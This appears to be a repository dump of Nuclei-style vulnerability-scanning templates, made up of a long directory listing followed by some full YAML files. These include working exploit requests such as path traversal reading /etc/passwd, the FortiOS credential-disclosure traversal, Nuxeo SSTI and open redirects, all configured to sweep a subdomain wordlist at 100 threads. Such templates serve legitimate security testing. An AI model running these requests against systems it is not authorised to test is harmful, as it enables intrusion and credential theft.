├── wordpress-accessible-wpconfig.yaml
├── wordpress-affiliatewp-log.yaml
├── wordpress-bbpress-plugin-listing.yaml
├── wordpress-db-backup-listing.yaml
├── wordpress-db-backup.yaml
├── wordpress-db-repair.yaml
├── wordpress-debug-log.yaml
├── wordpress-directory-listing-1.yaml
├── wordpress-directory-listing-2.yaml
├── wordpress-directory-listing-3.yaml
├── wordpress-directory-listing-4.yaml
├── wordpress-elementor-plugin-listing.yaml
├── wordpress-emails-verification-for-woocommerce-1.yaml
├── wordpress-emails-verification-for-woocommerce-2.yaml
├── wordpress-emergency-script.yaml
├── wordpress-git-config-1.yaml
├── wordpress-git-config-2.yaml
├── wordpress-gtranslate-plugin-listing.yaml
├── wordpress-installer-log.yaml
├── wordpress-rce-simplefilelist.yaml
├── wordpress-rdf-user-enum.yaml
├── wordpress-redirection-plugin-listing.yaml
├── wordpress-social-metrics-tracker.yaml
├── wordpress-tmm-db-migrate.yaml
├── wordpress-total-upkeep-backup-download.yaml
├── wordpress-updraftplus-pem-key.yaml
├── wordpress-user-enum.yaml
├── wordpress-woocommerce-listing.yaml
├── wordpress-woocommerce-sqli-1.yaml
├── wordpress-woocommerce-sqli-2.yaml
├── wordpress-wordfence-lfi.yaml
├── wordpress-wordfence-waf-bypass-xss.yaml
├── wordpress-wordfence-xss.yaml
├── wordpress-wpcourses-info-disclosure.yaml
├── wordpress-xmlrpc-listmethods.yaml
├── wordpress-zebra-form-xss.yaml
├── wp-123contactform-plugin-listing.yaml
├── wp-altair-listing-1.yaml
├── wp-altair-listing-2.yaml
├── wp-altair-listing-3.yaml
├── wp-altair-listing-4.yaml
├── wp-ambience-xss.yaml
├── wp-arforms-listing.yaml
├── wp-church-admin-xss.yaml
├── wp-config-setup.yaml
├── wp-custom-tables-xss.yaml
├── wp-email-subscribers-listing.yaml
├── wp-enabled-registration.yaml
├── wp-finder-xss.yaml
├── wp-flagem-xss.yaml
├── wp-full-path-disclosure.yaml
├── wp-grimag-open-redirect.yaml
├── wp-gtranslate-open-redirect.yaml
├── wp-idx-broker-platinum-listing.yaml
├── wp-install.yaml
├── wp-iwp-client-listing.yaml
├── wp-javospot-lfi.yaml
├── wp-knews-xss.yaml
├── wp-license-file.yaml
├── wp-mailchimp-log-exposure.yaml
├── wp-memphis-documents-library-lfi-1.yaml
├── wp-memphis-documents-library-lfi-2.yaml
├── wp-multiple-theme-ssrf.yaml
├── wp-nextgen-xss.yaml
├── wp-oxygen-theme-lfi.yaml
├── wp-phpfreechat-xss.yaml
├── wp-plugin-1-flashgallery-listing-1.yaml
├── wp-plugin-1-flashgallery-listing-2.yaml
├── wp-plugin-lifterlms.yaml
├── wp-plugin-utlimate-member.yaml
├── wp-popup-listing.yaml
├── wp-prostore-open-redirect.yaml
├── wp-securimage-xss.yaml
├── wp-sfwd-lms-listing.yaml
├── wp-simple-fields-lfi.yaml
├── wp-slideshow-xss.yaml
├── wp-socialfit-xss.yaml
├── wp-super-forms.yaml
├── wp-tinymce-lfi.yaml
├── wp-tutor-lfi.yaml
├── wp-upload-data.yaml
├── wp-vault-lfi.yaml
├── wp-woocommerce-email-verification-1.yaml
├── wp-woocommerce-email-verification-2.yaml
├── wp-woocommerce-file-download.yaml
├── wp-woocommerce-pdf-invoice-listing.yaml
├── wp-xmlrpc.yaml
├── wpdm-cache-session.yaml
├── wpmudev-pub-keys.yaml
├── wptouch-open-redirect.yaml
├── wuzhicms-sqli.yaml
├── xdcms-sqli.yaml
├── yarn-resourcemanager-rce.yaml
├── zabbix-dashboards-access.yaml
├── zabbix-error.yaml
├── zcms-v3-sqli.yaml
├── zenphoto-installation-sensitive-info-1.yaml
├── zenphoto-installation-sensitive-info-2.yaml
├── zenphoto-installation-sensitive-info-3.yaml
├── zenphoto-installation-sensitive-info-4.yaml
├── zenphoto-sensitive-info-1.yaml
├── zenphoto-sensitive-info-2.yaml
├── zenphoto-sensitive-info-3.yaml
├── zenphoto-sensitive-info-4.yaml
├── zhiyuan-file-upload.yaml
├── zhiyuan-oa-info-leak.yaml
├── zhiyuan-oa-session-leak.yaml
├── zhiyuan-oa-unauthorized.yaml
└── zms-auth-bypass.yaml
├── SSRF
├── ApacheSolr-SSRF-1.yaml
├── ApacheSolr-SSRF-2.yaml
├── ApacheSolr-SSRF-3.yaml
├── ApacheSolr-SSRF-4.yaml
├── ApacheSolr-SSRF-5.yaml
├── ApacheSolr-SSRF-6.yaml
├── ApacheStruts-RCE.yaml
├── CVE-2009-4223.yaml
├── CVE-2014-4210-1.yaml
├── CVE-2014-4210-2.yaml
├── CVE-2014-4210-3.yaml
├── CVE-2015-7450.yaml
├── CVE-2015-8813.yaml
├── CVE-2017-0929.yaml
├── CVE-2017-12629.yaml
├── CVE-2017-18638.yaml
├── CVE-2017-3506.yaml
├── CVE-2017-9506.yaml
├── CVE-2018-1000600-1.yaml
├── CVE-2018-1000600-2.yaml
├── CVE-2018-10818.yaml
├── CVE-2018-15517.yaml
├── CVE-2018-16167.yaml
├── CVE-2019-2616.yaml
├── CVE-2019-2767.yaml
├── CVE-2019-3929.yaml
├── CVE-2019-6715.yaml
├── CVE-2019-8451.yaml
├── CVE-2019-9978.yaml
├── CVE-2020-10770.yaml
├── CVE-2020-13117.yaml
├── CVE-2020-14883-1.yaml
├── CVE-2020-14883-2.yaml
├── CVE-2020-24148.yaml
├── CVE-2020-24589.yaml
├── CVE-2020-25506-1.yaml
├── CVE-2020-25506-2.yaml
├── CVE-2020-25506-3.yaml
├── CVE-2020-26919.yaml
├── CVE-2020-28188.yaml
├── CVE-2020-28871.yaml
├── CVE-2020-35713.yaml
├── CVE-2020-5412.yaml
├── CVE-2020-6308.yaml
├── CVE-2020-7796.yaml
├── CVE-2020-8813.yaml
├── CVE-2021-1497.yaml
├── CVE-2021-1498.yaml
├── CVE-2021-20837.yaml
├── CVE-2021-22205.yaml
├── CVE-2021-22214.yaml
├── CVE-2021-24472.yaml
├── CVE-2021-26084-1.yaml
├── CVE-2021-26084-10.yaml
├── CVE-2021-26084-2.yaml
├── CVE-2021-26084-3.yaml
├── CVE-2021-26084-4.yaml
├── CVE-2021-26084-5.yaml
├── CVE-2021-26084-6.yaml
├── CVE-2021-26084-7.yaml
├── CVE-2021-26084-8.yaml
├── CVE-2021-26084-9.yaml
├── CVE-2021-31755.yaml
├── CVE-2021-32305.yaml
├── CVE-2021-32819.yaml
├── CVE-2021-33357.yaml
├── CVE-2021-33544.yaml
├── CVE-2021-3577.yaml
├── CVE-2021-36380.yaml
├── CVE-2021-40438.yaml
├── CVE-2021-42237.yaml
├── Confluence-SSRF.yaml
├── Hashicorp Consul-RCE-1.yaml
├── Hashicorp Consul-RCE-2.yaml
├── JBoss-SSRF.yaml
├── Jenkins-RCE.yaml
├── OpenTSDB-RCE-1.yaml
├── OpenTSDB-RCE-2.yaml
├── PeopleSoft-XXE-1.yaml
├── PeopleSoft-XXE-2.yaml
├── Shellshock-RCE-1.yaml
├── cloudflare-image-ssrf.yaml
├── confluence-ssrf-sharelinks.yaml
├── fastjson-1-2-24-rce-1.yaml
├── fastjson-1-2-24-rce-2.yaml
├── fastjson-1-2-41-rce.yaml
├── fastjson-1-2-42-rce.yaml
├── fastjson-1-2-43-rce.yaml
├── fastjson-1-2-47-rce.yaml
├── fastjson-1-2-62-rce.yaml
├── fastjson-1-2-67-rce.yaml
├── fastjson-1-2-68-rce-1.yaml
├── fastjson-1-2-68-rce-2.yaml
├── fastjson-1-2-68-rce-3.yaml
├── fastjson-1.2.24-rce-1.yaml
├── fastjson-1.2.24-rce-2.yaml
├── fastjson-1.2.41-rce.yaml
├── fastjson-1.2.42-rce.yaml
├── fastjson-1.2.43-rce.yaml
├── fastjson-1.2.47-rce.yaml
├── fastjson-1.2.62-rce.yaml
├── fastjson-1.2.67-rce.yaml
├── fastjson-1.2.68-rce-1.yaml
├── fastjson-1.2.68-rce-2.yaml
├── fastjson-1.2.68-rce-3.yaml
├── hashicorp-consul-rce.yaml
├── hasura-graphql-ssrf.yaml
├── linkerd-ssrf-detect.yaml
├── mirai-unknown-rce.yaml
├── netgear-wnap320-rce.yaml
├── oob-header-based-interaction.yaml
├── oob-param-based-interaction.yaml
├── optilink-ont1gew-gpon-rce.yaml
├── sar2html-rce.yaml
├── ssrf-via-oauth-misconfig.yaml
├── targa-camera-ssrf.yaml
├── umbraco-base-ssrf-1.yaml
├── umbraco-base-ssrf-2.yaml
├── umbraco-base-ssrf-3.yaml
├── wp-xmlrpc-pingback-detection.yaml
├── xmlrpc-pingback-ssrf.yaml
└── zimbra-preauth-ssrf.yaml
└── Technologies
├── abyss-web-server.yaml
├── achecker-detect.yaml
├── acontent-detect.yaml
├── adobe-coldfusion-detect-1.yaml
├── adobe-coldfusion-detect-2.yaml
├── adobe-coldfusion-detect-3.yaml
├── adobe-coldfusion-detect-4.yaml
├── adobe-coldfusion-detect-5.yaml
├── adobe-coldfusion-detect-6.yaml
├── adobe-coldfusion-detector-1.yaml
├── adobe-coldfusion-detector-2.yaml
├── adobe-coldfusion-detector-3.yaml
├── adobe-coldfusion-detector-4.yaml
├── adobe-coldfusion-detector-5.yaml
├── adobe-coldfusion-detector-6.yaml
├── adobe-coldfusion-detector-error.yaml
├── adobe-coldfusion-error-detect.yaml
├── aem-detection.yaml
├── airflow-detect.yaml
├── apache-axis-detect-1.yaml
├── apache-axis-detect-2.yaml
├── apache-axis-detect-3.yaml
├── apache-detect.yaml
├── apache-guacamole.yaml
├── artica-web-proxy-detect.yaml
├── autobahn-python-detect.yaml
├── avantfax-detect.yaml
├── aviatrix-detect.yaml
├── aws-bucket-service.yaml
├── aws-cloudfront-service.yaml
├── aws-elastic-beanstalk-detect.yaml
├── basic-auth-detection.yaml
├── bedita-detect.yaml
├── bigbluebutton-detect.yaml
├── bigip-config-utility-detect-1.yaml
├── bigip-config-utility-detect-2.yaml
├── bigip-config-utility-detect-3.yaml
├── bigip-detection.yaml
├── bolt-cms-detect.yaml
├── bookstack-detect.yaml
├── brother-printer-detect.yaml
├── burp-api-detect.yaml
├── cacti-detect-1.yaml
├── cacti-detect-2.yaml
├── carestream-vue-detect-1.yaml
├── carestream-vue-detect-2.yaml
├── centreon-detect.yaml
├── chevereto-detect.yaml
├── clockwork-php-page.yaml
├── cockpit-detect.yaml
├── confluence-detect-1.yaml
├── confluence-detect-2.yaml
├── confluence-detect-3.yaml
├── confluence-detect-4.yaml
├── contacam.yaml
├── craft-cms-detect.yaml
├── crush-ftp-detect.yaml
├── daybyday-detect.yaml
├── default-apache-test-all.yaml
├── default-apache-test-page.yaml
├── default-apache2-page.yaml
├── default-apache2-ubuntu-page.yaml
├── default-asp-net-page.yaml
├── default-asp.net-page.yaml
├── default-centos-test-page.yaml
├── default-codeigniter-page.yaml
├── default-detect-generic.yaml
├── default-django-page.yaml
├── default-fastcgi-page.yaml
├── default-fedora-page.yaml
├── default-glassfish-server-page.yaml
├── default-ibm-http-server.yaml
├── default-iis7-page.yaml
├── default-jetty-page.yaml
├── default-lucee-page.yaml
├── default-microsoft-azure-page.yaml
├── default-movable-page.yaml
├── default-nginx-page.yaml
├── default-openresty.yaml
├── default-oracle-application-page.yaml
├── default-payara-server-page.yaml
├── default-plesk-page.yaml
├── default-redhat-test-page.yaml
├── default-ssltls-test-page.yaml
├── default-tomcat-page.yaml
├── default-windows-server-page.yaml
├── dell-idrac6-detect.yaml
├── dell-idrac7-detect.yaml
├── dell-idrac8-detect.yaml
├── dell-idrac9-detect.yaml
├── detect-sentry.yaml
├── dolibarr-detect.yaml
├── dotclear-detect-2.yaml
├── dotclear-detect.yaml
├── druid-detect.yaml
├── eg-manager-detect.yaml
├── elasticsearch-sql-client-detect.yaml
├── elfinder-detect-1.yaml
├── elfinder-detect-2.yaml
├── epmp-login.yaml
├── epson-wf-series.yaml
├── fanruanoa-detect-1.yaml
├── fanruanoa-detect-2.yaml
├── fanruanoa2012-detect.yaml
├── fastjson-version.yaml
├── fatpipe-mpvpn-detect.yaml
├── fatpipe-warp-detect.yaml
├── favicon-detection.yaml
├── fingerprinthub-web-fingerprints.yaml
├── firebase-detect.yaml
├── firebase-urls.yaml
├── froxlor-detect.yaml
├── gespage-detect.yaml
├── getsimple-cms-detect-1.yaml
├── getsimple-cms-detect-2.yaml
├── getsimple-cms-detector.yaml
├── gilacms-detect-1.yaml
├── gilacms-detect-2.yaml
├── gitea-detect-1.yaml
├── gitea-detect-2.yaml
├── glpi-cms-detect-1.yaml
├── glpi-cms-detect-2.yaml
├── glpi-cms-detect-3.yaml
├── google-bucket-service.yaml
├── google-storage.yaml
├── grav-cms-detect.yaml
├── graylog-api-browser.yaml
├── gunicorn-detect.yaml
├── harbor-detect.yaml
├── herokuapp-detect.yaml
├── hikvision-detection-1.yaml
├── hikvision-detection-2.yaml
├── home-assistant.yaml
├── hp-blade-admin-detect.yaml
├── hp-device-info-detect.yaml
├── hp-laserjet-detect.yaml
├── hp-media-vault-detect.yaml
├── ibm-http-server.yaml
├── ibm-sterling-detect.yaml
├── ilo-detect.yaml
├── influxdb-detect.yaml
├── internet-service.yaml
├── iplanet-web-server.yaml
├── itop-detect.yaml
├── jaspersoft-detect.yaml
├── jeedom-detect.yaml
├── jellyfin-detect-2.yaml
├── jellyfin-detect-3.yaml
├── jellyfin-detect-4.yaml
├── jellyfin-detect.yaml
├── jenkins-detect.yaml
├── jitsi-meet.yaml
├── jolokia.yaml
├── jsf-detection.yaml
├── kevinlab-device-detect-1.yaml
├── kevinlab-device-detect-2.yaml
├── kibana-detect-1.yaml
├── kibana-detect-2.yaml
├── kibana-detect-3.yaml
├── kong-detect.yaml
├── kubernetes-enterprise-manager.yaml
├── kubernetes-mirantis.yaml
├── kubernetes-version.yaml
├── landrayoa-detect.yaml
├── liferay-portal-detect-1.yaml
├── liferay-portal-detect-2.yaml
├── lighttpd-default.yaml
├── linkerd-badrule-detect.yaml
├── linkerd-service-detect.yaml
├── liveview-axis-camera.yaml
├── lotus-domino-version-1.yaml
├── lotus-domino-version-2.yaml
├── lotus-domino-version-3.yaml
├── lotus-domino-version-4.yaml
├── lotus-domino-version-5.yaml
├── lotus-domino-version-6.yaml
├── lotus-domino-version-7.yaml
├── lucee-detect.yaml
├── lutron-iot-default-login.yaml
├── magento-detect-1.yaml
├── magento-detect-2.yaml
├── magmi-detect.yaml
├── maian-cart-detect.yaml
├── mautic-crm-detect.yaml
├── metabase-detect.yaml
├── microsoft-exchange-server-detect.yaml
├── microstrategy-detect-1.yaml
├── microstrategy-detect-10.yaml
├── microstrategy-detect-11.yaml
├── microstrategy-detect-12.yaml
├── microstrategy-detect-13.yaml
├── microstrategy-detect-14.yaml
├── microstrategy-detect-15.yaml
├── microstrategy-detect-16.yaml
├── microstrategy-detect-2.yaml
├── microstrategy-detect-3.yaml
├── microstrategy-detect-4.yaml
├── microstrategy-detect-5.yaml
├── microstrategy-detect-6.yaml
├── microstrategy-detect-7.yaml
├── microstrategy-detect-8.yaml
├── microstrategy-detect-9.yaml
├── mobotix-guest-camera.yaml
├── moinmoin-detect.yaml
├── mrtg-detect-1.yaml
├── mrtg-detect-2.yaml
├── mrtg-detect-3.yaml
├── netsweeper-webadmin-detect-1.yaml
├── netsweeper-webadmin-detect-2.yaml
├── network-camera-detect.yaml
├── nextcloud-detect-1.yaml
├── nextcloud-detect-2.yaml
├── nextcloud-detect-3.yaml
├── nexus-detect.yaml
├── nginx-linux-page.yaml
├── nginx-version.yaml
├── nifi-detech-1.yaml
├── nifi-detech-2.yaml
├── nifi-detech-3.yaml
├── nifi-detech-4.yaml
├── nifi-detech-5.yaml
├── nifi-detech-6.yaml
├── nifi-detech-7.yaml
├── node-red-detect.yaml
├── nuuno-network-login.yaml
├── oauth2-detect.yaml
├── octobercms-detect-1.yaml
├── octobercms-detect-2.yaml
├── oidc-detect.yaml
├── olivetti-crf-detect.yaml
├── oneblog-detect.yaml
├── open-mjpg-streamer.yaml
├── openam-detection-1.yaml
├── openam-detection-10.yaml
├── openam-detection-11.yaml
├── openam-detection-12.yaml
├── openam-detection-13.yaml
├── openam-detection-14.yaml
├── openam-detection-2.yaml
├── openam-detection-3.yaml
├── openam-detection-4.yaml
├── openam-detection-5.yaml
├── openam-detection-6.yaml
├── openam-detection-7.yaml
├── openam-detection-8.yaml
├── openam-detection-9.yaml
├── opencast-detect.yaml
├── opensis-detect-1.yaml
├── opensis-detect-2.yaml
├── openx-detect.yaml
├── operations-automation-default-page.yaml
├── oracle-dbass-detect.yaml
├── oracle-dbcs.yaml
├── oracle-http-server-12c.yaml
├── oracle-iplanet-web-server.yaml
├── owasp-juice-shop-detected.yaml
├── panasonic-network-management.yaml
├── pega-detect.yaml
├── php-proxy-detect-1.yaml
├── php-proxy-detect-2.yaml
├── phpcollab-detect.yaml
├── pi-hole-detect.yaml
├── plone-cms-detect.yaml
├── prometheus-exposed-panel.yaml
├── prtg-detect-1.yaml
├── prtg-detect-2.yaml
├── prtg-detect-3.yaml
├── redcap-detector.yaml
├── redmine-cli-detect.yaml
├── remkon-manager-detect.yaml
├── rhymix-cms-detect.yaml
├── s3-detect.yaml
├── sage-detect.yaml
├── sap-igs-detect.yaml
├── sap-netweaver-detect.yaml
├── sap-netweaver-webgui.yaml
├── sap-web-dispatcher-admin-portal.yaml
├── sap-web-dispatcher.yaml
├── sceditor-detect.yaml
├── seeddms-detect.yaml
├── selea-ip-camera.yaml
├── shiro-detect.yaml
├── shopizer-detect-1.yaml
├── shopizer-detect-2.yaml
├── shopware-detect-1.yaml
├── shopware-detect-2.yaml
├── sitecore-default-page.yaml
├── sitecore-version.yaml
├── sonicwall-email-security-detect.yaml
├── springboot-actuator-1.yaml
├── springboot-actuator-2.yaml
├── sql-server-reporting.yaml
├── stem-audio-table-private-keys.yaml
├── strapi-cms-detect.yaml
├── synology-web-station.yaml
├── targa-camera-lfi.yaml
├── tech-detect.yaml
├── telerik-dialoghandler-detect-1.yaml
├── telerik-dialoghandler-detect-10.yaml
├── telerik-dialoghandler-detect-11.yaml
├── telerik-dialoghandler-detect-12.yaml
├── telerik-dialoghandler-detect-13.yaml
├── telerik-dialoghandler-detect-14.yaml
├── telerik-dialoghandler-detect-15.yaml
├── telerik-dialoghandler-detect-16.yaml
├── telerik-dialoghandler-detect-2.yaml
├── telerik-dialoghandler-detect-3.yaml
├── telerik-dialoghandler-detect-4.yaml
├── telerik-dialoghandler-detect-5.yaml
├── telerik-dialoghandler-detect-6.yaml
├── telerik-dialoghandler-detect-7.yaml
├── telerik-dialoghandler-detect-8.yaml
├── telerik-dialoghandler-detect-9.yaml
├── telerik-fileupload-detect.yaml
├── teradici-pcoip.yaml
├── terraform-detect.yaml
├── thinkcmf-detection.yaml
├── tileserver-gl.yaml
├── tomcat-detect.yaml
├── tor-socks-proxy.yaml
├── unauthorized-brother-access-detect.yaml
├── upnp-device.yaml
├── vmware-version-detect.yaml
├── vmware-vrealize-detect.yaml
├── voipmonitor-detect.yaml
├── waf-detect.yaml
├── wazuh-detect.yaml
├── web-ftp-detect.yaml
├── weblogic-detect.yaml
├── webmodule-ee.yaml
├── werkzeug-debugger-detect.yaml
├── wondercms-detect.yaml
├── wordpress-gotmls-detect.yaml
├── wso2-apimanager-detect.yaml
├── wuzhicms-detect.yaml
├── xampp-default-page.yaml
├── xp-webcam.yaml
├── xxljob-admin-detect.yaml
├── yapi-detect.yaml
└── yzmcms-detect.yaml
/Templates/APIs/strapi-page-1.yaml:
--------------------------------------------------------------------------------
1 | id: strapi-page 1
2 |
3 | info:
4 | name: Strapi Page
5 | author: dhiyaneshDk
6 | severity: info
7 | reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22
8 | tags: api,strapi
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
21 | Accept-Encoding: gzip, deflate
22 | Accept: */*
23 | matchers:
24 | - type: word
25 | words:
26 | - 'Welcome to your Strapi app'
27 |
--------------------------------------------------------------------------------
/Templates/APIs/strapi-page-2.yaml:
--------------------------------------------------------------------------------
1 | id: strapi-page 2
2 |
3 | info:
4 | name: Strapi Page
5 | author: dhiyaneshDk
6 | severity: info
7 | reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22
8 | tags: api,strapi
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /docs HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
21 | Accept-Encoding: gzip, deflate
22 | Accept: */*
23 | matchers:
24 | - type: word
25 | words:
26 | - 'Welcome to your Strapi app'
27 |
--------------------------------------------------------------------------------
/Templates/APIs/wsdl-api.yaml:
--------------------------------------------------------------------------------
1 | id: wsdl-api
2 |
3 | info:
4 | name: wsdl-detect
5 | author: jarijaas
6 | severity: info
7 | tags: exposure,api
8 | description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/)
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /?wsdl HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
21 | Accept-Encoding: gzip, deflate
22 | Accept: */*
23 | matchers:
24 | - type: word
25 | words:
26 | - "wsdl:definitions"
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2017-3528.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2017-3528
2 |
3 | info:
4 | name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
5 | author: 0x_Akoko
6 | severity: low
7 | reference: |
8 | - https://blog.zsec.uk/cve-2017-3528/
9 | - https://www.exploit-db.com/exploits/43592
10 | tags: oracle,redirect
11 |
12 | requests:
13 | - payloads:
14 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
15 | attack: sniper
16 | threads: 100
17 |
18 | raw:
19 | - |
20 | GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com HTTP/1.1
21 | Host: {{Subdomains}}
22 |
23 | matchers:
24 | - type: word
25 | words:
26 | - 'noresize src="/\example.com?configName='
27 | part: body
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-11409-1.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-11409 1
2 |
3 | info:
4 | name: Splunk Sensitive Information Disclosure
5 | author: harshbothra_
6 | severity: medium
7 | reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
8 | tags: cve,cve2018,splunk
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 | - type: word
26 | words:
27 | - licenseKeys
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-11409-2.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-11409 2
2 |
3 | info:
4 | name: Splunk Sensitive Information Disclosure
5 | author: harshbothra_
6 | severity: medium
7 | reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
8 | tags: cve,cve2018,splunk
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /__raw/services/server/info/server-info?output_mode=json HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 | - type: word
26 | words:
27 | - licenseKeys
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-11759-1.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-11759 1
2 |
3 | info:
4 | name: Apache Tomcat JK Status Manager Access
5 | author: harshbothra_
6 | severity: medium
7 | reference: https://github.com/immunIT/CVE-2018-11759
8 | tags: cve,cve2018,apache
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /jkstatus HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 | - type: word
26 | words:
27 | - "JK Status Manager"
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-11759-2.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-11759 2
2 |
3 | info:
4 | name: Apache Tomcat JK Status Manager Access
5 | author: harshbothra_
6 | severity: medium
7 | reference: https://github.com/immunIT/CVE-2018-11759
8 | tags: cve,cve2018,apache
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /jkstatus; HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 | - type: word
26 | words:
27 | - "JK Status Manager"
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-13379.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-13379
2 |
3 | info:
4 | name: FortiOS - Credentials Disclosure
5 | author: organiccrap
6 | severity: high
7 | tags: cve,cve2018,fortios
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - "var fgt_lang"
23 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-14574.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-14574
2 |
3 | info:
4 | name: Django Open Redirect
5 | author: pikpikcu
6 | severity: low
7 | tags: cve,cve2018,django,redirect
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET //www.example.com HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 301
24 | - type: regex
25 | regex:
26 | - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com"
27 | part: header
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-14728.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-14728
2 |
3 | info:
4 | name: Responsive filemanager 9.13.1 - SSRF/LFI
5 | author: madrobot
6 | severity: high
7 | tags: cve,cve2018,ssrf,lfi
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | POST /filemanager/upload.php HTTP/1.1
18 | Host: {{Subdomains}}
19 |
20 | fldr=&url=file:///etc/passwd
21 | matchers:
22 | - type: regex
23 | regex:
24 | - "root:[x*]:0:0:"
25 | part: body
26 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-16299.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-16299
2 |
3 | info:
4 | name: WordPress Plugin Localize My Post 1.0 - LFI
5 | author: 0x_Akoko
6 | severity: high
7 | reference: https://www.exploit-db.com/exploits/45439
8 | tags: wordpress,cve2018,cve,lfi
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 |
23 | - type: regex
24 | regex:
25 | - "root:[x*]:0:0"
26 |
27 | - type: status
28 | status:
29 | - 200
30 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-16341.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-16341
2 |
3 | info:
4 | name: Nuxeo Authentication Bypass Remote Code Execution
5 | author: madrobot
6 | severity: high
7 | description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI
8 | tags: cve,cve2018,nuxeo,ssti,rce
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /nuxeo/login.jsp/pwn${313333333333333330+7}.xhtml HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "313333333333333337"
25 | part: body
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-3714.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-3714
2 | info:
3 | name: node-srv Path Traversal
4 | author: madrobot
5 | severity: high
